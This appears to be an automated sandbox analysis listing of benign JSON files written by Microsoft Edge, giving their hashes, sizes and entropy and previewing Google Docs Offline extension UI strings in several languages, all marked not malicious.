                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
